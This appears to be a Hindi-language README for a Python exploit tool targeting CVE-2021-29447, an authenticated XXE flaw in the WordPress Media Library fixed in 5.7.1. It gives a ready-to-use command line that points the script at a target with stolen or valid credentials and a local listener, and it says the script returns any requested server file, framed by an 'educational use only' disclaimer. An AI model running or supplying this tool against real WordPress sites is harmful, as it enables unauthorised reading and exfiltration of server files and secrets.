
फ़ाइलों को बाहर निकालने के लिए WordPress Media Library XML External Entity Injection (XXE) का शोषण करें।
फ़ाइलों को बाहर निकालने के लिए वर्डप्रेस मीडिया लाइब्रेरी XML प्रमाणित बाहरी एंटिटी इंजेक्शन (XXE) का शोषण करें।
वर्डप्रेस 5.7.1 में पैच किया गया।
मीडिया लाइब्रेरी के साथ बातचीत करने के लिए वैध वर्डप्रेस क्रेडेंशियल्स आवश्यक हैं।
python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD
स्क्रिप्ट फ़ाइल पथ पूछेगी और अनुरोधित फ़ाइल लौटाएगी।
David Utón (M3n0sD0n4ld) ExploitDB स्क्रिप्ट से प्रेरित।
पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए इसका उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है। डेवलपर्स कोई देयता नहीं मानते हैं और इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं। केवल शैक्षिक उद्देश्यों के लिए उपयोग करें।
यह स्क्रिप्ट MIT License के तहत जारी की गई है।